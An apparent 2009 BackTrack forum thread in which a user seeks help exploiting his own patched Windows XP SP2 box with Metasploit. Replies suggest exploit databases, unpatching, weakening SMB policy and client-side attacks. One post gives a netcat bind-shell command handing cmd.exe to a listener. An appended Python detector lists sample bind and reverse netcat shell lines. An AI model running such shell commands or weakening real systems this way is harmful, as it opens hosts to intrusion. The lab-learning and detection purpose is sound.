
Thread: Need Help Finding Exploits for Windows XP SP2

  1. #1
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    9

    Need Help Finding Exploits for Windows XP SP2

    Hello, this is my first post on the Remote Exploit forums, but I have a moderate amount of experience with Linux and I have been learning about BackTrack for about a week now. I've learned quite a lot about decrypting WEP keys, and just how simple it is. After I realized just how insecure WEP is, I changed my network encryption to a 63-character WPA2 key with AES and TKIP. Since my wireless network is now mostly secure, I don't think I have to worry about anyone using my internet connection, but I would like to learn how to exploit a Windows Machine that I own. The system that I am trying to gain access to using metasploit is owned by me. I am doing this for educational purposes only, and I was wondering if you guys could help me learn how to gain access to the computer using metasploit. I have read a bit about how the exploits are done, but I haven't been able to figure out how to get MetaSploit to work. Here are some details about my configuration:

    * The (home) network I am on is owned by me. The access point is called "YNXA7". It is encrypted wirelessly using WPA2 and a 63-character key generated from GRC.

    * The computer I am attempting to run the exploit from is connected to the network wirelessly, and is given the IP address of 192.168.1.2 by DHCP.

    * The computer which I am testing for vulnerability to exploits is on the IP address of 192.168.1.3, and it is running Windows XP SP2. It has few programs installed except for the default software and McAfee Total Protection. All Windows Updates have been installed.

    * The name of the Windows workgroup is "WORKGROUP", and because the machine is intended to be the target of the attack, I set its network name to VICTIM.home.

    After running nmap on the computer using nmap -sU 192.168.1.3, here is the output I get:

    Starting Nmap 4.60 ( hxxp:\\nmap.org ) at 2009-01-26 18:55 GMT
    Interesting ports on VICTIM.home (192.168.1.3):
    Not shown: 1482 closed ports
    PORT STATE SERVICE
    137/udp open|filtered netbios-ns
    138/udp open|filtered netbios-dgm
    445/udp open|filtered microsoft-ds
    500/udp open|filtered isakmp
    1900/udp open|filtered UPnP
    4500/udp open|filtered sae-urn
    MAC Address: 00:16:6F:68:A0:6E (Intel)

    Nmap done: 1 IP address (1 host up) scanned in 6.502 seconds

    I have MetaSploit 3 running on the computer that I have backtrack on at the default web address of hxxp:\\127.0.0.1:55555, and I have unsuccessfully tried a MSRPC exploit. Sorry for the weird URL formatting but I'm not allowed to post URLs yet.

    Could anyone help me figure out how it would be possible to exploit on this computer?

  2. #2
    Junior Member
    Join Date
    Oct 2008
    Posts
    37


    Metasploit doesn't have everything. Try going to milw0rm.com

  3. #3
    Member
    Join Date
    Jan 2010
    Location
    The new forums
    Posts
    462


    All Windows Updates have been installed.
    This is your problem. Try finding some vulnerable software exploits from Metasploit and add them to your XP machine (FTP, SMTP, IMAP, etc). Or you can try to initiate client-side attacks through email or IE.

  4. #4
    Senior Member SephStorm
    Join Date
    Aug 2008
    Posts
    166


    I have had this issue as well. When you review targets under BackTrack, most of the targets are 2k, XP SP1 machines. Being that it is not possible in my knowledge to downgrade from SP2 to 1, this makes testing difficult for me. In addition, I have never had success downloading updates to BT, however that is to be expected, as I have never successfully installed a version of BT to a computer. (I was so close!)
    "You're only smoke and mirrors..."

  5. #5


    Quote Originally Posted by aliendude5300
    * The computer which I am testing for vulnerability to exploits is on the IP address of 192.168.1.3, and it is running Windows XP SP2. All Windows Updates have been installed.

    Could anyone help me figure out how it would be possible to exploit on this computer?
    Let me see if I understand this. You have a FULLY patched XP SP2 box and you want to exploit it using metasploit (i.e. publicly available exploits)?

    If it is FULLY patched, then generally speaking, no public exploits should work (there may be some that could work given some kind of specific set up). But in general, if it is fully patched, you either need some kind of misconfiguration or a 0-day exploit.

    You could change the group policy to allow "classic" network logins. That will open up the potential for some SMB type attacks. Go to Administrative Tools > Local Security Policy > Security Options and change "Network access: Sharing and security model for local accounts" from Guest Only to Classic.

    Now you can login remotely using one of the local accounts (such as administrator). You will also need to set an administrator password.

    Good Luck...

  6. #6
    Moderator KMDave
    Join Date
    Jan 2010
    Posts
    2,281


    Metasploit is nice to do a quick and dirty test but if you want to get into a machine often Metasploit automatic exploitation isn't working the way you want it to.

    The best would be to learn how exploits work, how to find them and how to write/modify exploits.

    As said before, if the machine is fully patched you can most likely only do attacks which require someone on the victim machine to open something (email/website/playlist...).
    Tiocfaidh ár lá

  7. #7
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008


    Quote Originally Posted by KMDave
    Metasploit is nice to do a quick and dirty test but if you want to get into a machine often Metasploit automatic exploitation isn't working the way you want it to.

    The best would be to learn how exploits work, how to find them and how to write/modify exploits.

    As said before, if the machine is fully patched you can most likely only do attacks which require someone on the victim machine to open something (email/website/playlist...).
    I agree. And an excellent playground when starting out learning how exploits work is PwnOS, which can be downloaded from http://forums.heorot.net/.
    -Monkeys are like nature's humans.

  8. #8
    Senior Member
    Join Date
    Feb 2010
    Posts
    146


    cat /pentest/exploits/milw0rm/sploitlist.txt | grep XP
    But as stated by others, your problem probably lies in the fact that you have fully patched your machine, so if you have a fully isolated network then uninstall/remove the patches.
    open source = open minds, human knowledge belongs to the world

  9. #9
    Member kazalku
    Join Date
    Feb 2009
    Posts
    416


    As said before, if the machine is fully patched you can most likely only do attacks which require someone on the victim machine to open something (email/website/playlist...).
    Search this forum for a thread titled "Metasploiting for BT3 - Reverse TCP" and select the first one, by phoenix910. I would download the pdf file (the link can be found inside the description).

    This tutorial is an excellent piece of work, very helpful writing with a friendly approach. And it works perfectly; I checked on the BT3 platform. Works fine no matter whether the victim is Vista/XP, firewall on/off. :-)

  10. #10
    Junior Member
    Join Date
    Jan 2010
    Posts
    42


    Hi,

    If you are looking to practice Metasploit, then as suggested by other members, you need to have some vulnerability on your XP SP2 machine.

    The first thing I don't understand on your part is why you did only UDP scanning of the target machine (-sU). You should have scanned TCP as well.

    Anyway, for practicing Metasploit, look for the netcat NT 1.10 version. It's vulnerable when you run it as follows:

    # nc.exe -v -L -p 8080 -e cmd.exe
    v: verbose
    L: listen harder i.e. even after disconnecting once it should get ready for listening again
    p: port to listen on
    e: program to execute

    With the NT 1.10 version, -e is the vulnerable part. Metasploit has an exploit for it.

    You may need to either shut off your firewall or allow an exception for port 8080, or you may go for a reverse connect from XP SP2 to your attacking machine.

    From here onwards I can spoon-feed you for both scenarios, but it is better that you look into these two conditions on your own.

    Let us know if you get stuck at any point, but we expect you to google 10 times before you ask something here.

    rgds
    fr0zen sm0ke
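
As an added defender-side example (not code from the thread or from any of its posters): the listener in post #10 hands cmd.exe to whoever connects, and that same `-e` pattern is what a host audit should look for. The script below parses constructed process-list lines, flags nc/ncat/netcat invocations that pass a program via -e, and separates bind (-l/-L) from reverse-connect use; the sample entries and file paths are constructed.

```python
import re
import shlex

NETCAT_NAME = re.compile(r"(?:^|[\\/])(?:nc|ncat|netcat)(?:\.exe)?$", re.IGNORECASE)

# Constructed sample "<pid> <command line>" entries (not captured from a real host).
SAMPLE_PROCESSES = [
    "1040 C:\\WINDOWS\\system32\\svchost.exe -k netsvcs",
    "2212 C:\\tools\\nc.exe -v -L -p 8080 -e cmd.exe",   # the listener from post #10
    "2300 nc -lvp 4444 -e /bin/sh",                        # same idea, clustered flags
    "2404 nc -v fileserver.example 80",                    # plain client use: not flagged
    "2616 nc.exe -e cmd.exe 192.168.1.2 4444",             # reverse connect, no listen flag
]


def parse_netcat(cmdline):
    """Return {"mode", "port", "program"} if cmdline is netcat with -e, else None."""
    argv = shlex.split(cmdline, posix=False)  # non-posix keeps backslashes literal
    # Only look at nc/ncat/netcat, with or without a path or .exe suffix.
    if not argv or not NETCAT_NAME.search(argv[0].strip('"')):
        return None
    listen, port, program = False, None, None
    i = 1
    while i < len(argv):
        tok = argv[i]
        i += 1
        if not tok.startswith("-") or len(tok) < 2:
            continue
        for letter in tok[1:]:  # walk each letter so "-lvp 4444" is handled too
            if letter in ("l", "L"):
                listen = True
            elif letter == "e" and i < len(argv):
                program = argv[i]
                i += 1
            elif letter == "p" and i < len(argv):
                port = argv[i]
                i += 1
    if program is None:
        return None
    return {"mode": "bind" if listen else "reverse", "port": port, "program": program}


def find_shell_handoffs(process_lines):
    """Apply parse_netcat to every '<pid> <command line>' entry; return the flagged ones."""
    findings = []
    for line in process_lines:
        pid, _, cmdline = line.strip().partition(" ")
        hit = parse_netcat(cmdline)
        if hit is not None:
            hit["pid"] = int(pid)
            findings.append(hit)
    return findings
```

A reverse-connect hit has no listen flag and no port, which is exactly why a firewall rule on the XP box alone does not cover the second scenario post #10 mentions.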
